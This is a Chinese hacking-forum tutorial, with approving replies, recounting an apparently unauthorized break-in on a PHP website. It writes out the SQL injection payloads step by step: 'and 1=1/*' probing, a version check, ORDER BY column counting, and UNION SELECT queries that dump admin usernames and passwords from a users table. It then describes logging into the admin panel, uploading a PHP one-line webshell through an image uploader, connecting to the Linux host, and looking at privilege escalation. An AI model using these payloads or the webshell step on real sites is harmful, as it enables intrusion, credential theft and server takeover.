记一次PHP的简单注入!
文章来源:岁月联盟作者:冰忆浪子
本文没有什么技术含量,只是教给菜鸟如何对PHP的站进行注入。高手略过。。
废话不多说了,直接进入正题,打开网站 [url]http://www.xxx.com/[/url]后发现是PHP做的,就随便打开了一个页面在后面加了 and 1=1/*
返回正常页面。如图1
[attach]6326[/attach]
在提交: and 1=2/* 返回了一个错误页面,说明可以注入。如图2
[attach]6314[/attach]
然后在提交 and ord(mid(version(),1,1))>51 /* 主要是看下数据库的版本是不是3.0以上,如果是3.0以上的我们就可以用union查
询,就不用一个一个的猜字段的个数了。返回了正常的页面,说明支持UNION查询。如图3
[attach]6315[/attach]
然后就是利用 order by 来猜字段了。提交 order by 10/* 返回了了正确的页面,如图4
[attach]6316[/attach]
说明字段个数大于10,我们继续提交 order by 20/* 返回了错误页面。如图5
[attach]6317[/attach]
说明字段个数在10-20之间,然后继续提交 order by ** 最后试到 order by 12/* 时返回了正确页面,说明字段数为12。如图6
[attach]6318[/attach]
然后我们来猜数据库都有哪些表,提交:and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12 from admin/* 返回了错误页面,
说明不存在admin 这个表。如图7
[attach]6319[/attach]
我们继续提交 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12 from ****/* 最后提交and 1=2 union select
1,2,3,4,5,6,7,8,9,10,11,12 from users/* 时,返回了正确页面,说明存在users表,字段也显示了出来。如图8
[attach]6320[/attach]
猜到了表我们就该继续猜字段,提交 and 1=2 union select 1,2,3,4,5,6,7,name,9,10,11,12 from uses/* 哈哈,运气不错
成功猜到了字段,得到帐号。如图9
[attach]6321[/attach]
有了帐号就差密码了,我们继续提交 and 1=2 union select 1,2,3,4,5,6,7,password,9,10,11,12 from users/* 返回正确页
面,得到密码。 如图10
[attach]6322[/attach]
有了帐号和密码还需要找后台,试下 http:/www.xxx.com/admin 后台自己乖乖的跑了出来。如图 11
[attach]6323[/attach]
用我们刚刚得到的帐号和密码登陆,我在后台逛了一下,发现了一个上传图片的地方,试着上传PHP一句话木马,既然成功了(今天运气不错啊!)
如图12
[attach]6324[/attach]
然后就用客户端连了上去,发现是LINUX的主机。如图13
[attach]6325[/attach]
权限设置的很变态,只有放上传文件的Uploads文件夹可写!提权看来只能溢出了! 不写了,到此结束吧! PHP偶从没这么简单猜出后台,表也从没猜出过.[(:huffy:)] [(:huffy:)] [(:huffy:)]
LZ貌似RP很好. [(:lol:)] [(:lol:)]
呵呵,那天运气很好~! 运气不错,人品好啊! 比较详细,能看明白。哈哈 比较详细,能看明白。哈哈 运气和人品啊!!!
啊啊啊啊
难道我人品有问题不成。。。
忽忽。。。 好好看一下php注射。 猜要猜到什么时候呀.[(:huffy:)]
页:
[1]